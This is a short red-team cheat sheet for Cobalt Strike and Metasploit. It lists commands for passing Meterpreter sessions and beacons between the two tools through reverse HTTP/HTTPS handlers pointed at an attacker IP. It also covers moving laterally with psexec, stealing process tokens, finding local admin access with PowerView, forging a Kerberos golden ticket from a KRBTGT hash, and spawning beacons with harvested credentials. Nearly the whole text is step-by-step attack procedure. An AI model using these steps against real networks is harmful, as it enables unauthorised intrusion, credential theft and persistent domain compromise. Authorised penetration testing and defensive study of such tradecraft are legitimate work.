Cobalt Strike

Move a meterpreter / metasploit session to Cobalt

(Spawn Beacon from Meterpreter)

in Cobalt
setup a listener
windows/beacon_http/reverse_http

in Metasploit
use exploit/windows/local/payload_inject
set PAYLOAD windows/meterpreter/reverse_http
set LHOST [IP of Cobalt Strike Listenter]
set LPORT 80
set session 1
set DisablePayloadHandler True
exploit (-j)

Move a Cobalt beacon to Metasploit

(Spawn Meterpreter from Beacon)

in Metasploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST ATTACKINGIP
set LPORT 443
set ExitOnSession False
exploit (-j)

in Cobalt
setup a foreign listener
windows/foreign/reverse_https
Right Click Beacon-->Spawn-->Select foreign beacon

Note: Cobalt will spawn an x86 shell, for any post exploit modules make sure to migrate to an x64 process like svchost
if applicable

View targets available from Initial Target

Right Click Target --> Explore -->Net View
or
Net computers
net dclist

Find where we are a local admin

beacon: powershell-import /root/PowerTools/PowerView/powerview.ps1
beacon: Invoke-FindLocalAdminAccess

Login to target where we are local admin

Right Click Target -->Login -->psexec (change Listener to SMB beacon)(choose a session)
(user session's current token)

Get token from processes

Right Click Target -->Explore-->Process List-->Steal Token

Create Multiple beacons on targets

Select the targets --> Right Click -->Login -->psexec --> choose a beacon with an elevated token-->
(user session's current token)-->Launch

Golden Ticket Generation

Need four items
1)User
2)Domain
3)Domain SID
4)KRBTGT Hash

3) shell whoami /user to obtain SID (also provides 1 & 2)
4) obtained from a previous compromise (i.e. NTLM hashdump)

With that Right Click-->Access-->Golden Ticket-->Input Four fields-->Build

Verify it works: #shell dir \\[DC]\C$

Beacon as another user with creds

Right Click Beacon-->SpawnAs-->enter creds
note for domain account enter domain but for local account enter "." in the domain field